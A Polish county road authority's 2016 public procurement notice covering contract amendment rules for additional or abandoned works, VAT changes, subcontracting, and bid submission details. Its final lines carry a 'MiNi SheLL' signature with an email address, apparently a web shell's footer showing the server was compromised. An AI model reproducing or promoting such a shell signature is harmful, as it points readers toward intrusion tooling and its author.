    zgodnie z ust.3 i zatwierdzonych przez  Zamawiającego przy zastosowaniu cen jednostkowych 
    zawartych w kosztorysie ofertowym Wykonawcy . 
W przypadku zmiany przez władzę ustawodawczą określonej  procentowej stawki podatku 
    VAT , kwota brutto wynagrodzenia zostanie aneksem do niniejszej umowy odpowiednio   
    dostosowana.
 przypadku, gdyby wynagrodzenie Wykonawcy miało przekroczyć  kwotę określoną w umowie   
    Strony mogą dokonać zmiany tej kwoty w drodze aneksu do umowy.
W przypadku stwierdzenia konieczności wykonania robót dodatkowych lub zamiennych, gdy ich  
    wykonanie będzie niezbędne do prawidłowego - zgodnego z zasadami wiedzy technicznej,  
    obowiązującymi przepisami i normami wykonania przedmiotu umowy 
    Wykonawca poinformuje Zamawiającego w terminie 3 dni od powzięcia informacji o potrzebie  
    ich wykonania w formie protokołu konieczności potwierdzonego przez  Inspektora Nadzoru,  
    Głównego Księgowego i zatwierdzonego przez Zamawiającego dołączając kosztorys ofertowy 
    na roboty dodatkowe lub zamienne sporządzony na podstawie cen jednostkowych z kosztorysu       
    ofertowego stanowiący załącznik do niniejszej umowy . 
Bez  zatwierdzenia przez Zamawiającego protokołu konieczności Wykonawca nie może   
     rozpocząć robót  dodatkowych, zamiennych ani ograniczyć zakresu rzeczowego robót.
W przypadku wystąpienia składników kalkulacyjnych innych niż występują w kosztorysie 
     ofertowym, należy te składniki wycenić z zachowaniem cen czynników produkcji i narzutów 
     podanych w ofercie.
W przypadku braku takich cen należy te składniki wycenić wg średnich cen z SEKONCENBUD
      za ostatni kwartał poprzedzający sporządzenie kosztorysu ofertowego na roboty dodatkowe lub 
      zamienne przy zachowaniu narzutów z kosztorysu ofertowego  oraz nakładów rzeczowych 
      określonych w Katalogach Nakładów Rzeczowych(KNR), a w przypadku braku określenia robót
      w KNR, wg innych ogólnie stosowanych katalogów nakładów własnych zaakceptowanych
      przez Zamawiającego.  Zamawiający dopuszcza również ograniczenie zakresu rzeczowego przedmiotu umowy,gdy  
     ich wykonanie okaże się zbędne tzw. roboty zaniechane. 
Zmiana umowy będzie miała miejsce, gdy Wykonawca wystąpi wnioskiem do Zamawiającego o wyrażenie zgody na powierzenie 
                Podwykonawcy części zamówienia, pomimo zobowiązania w ofercie wykonania
                zamówienia bez podwykonawców.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdpbrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Brzegu ul. Wyszyńskiego 23  49-300 Brzeg 
pokój nr 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2016 godzina 10:00, miejsce: 49-300 Brzeg ul.Wyszyńskiego 23 pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com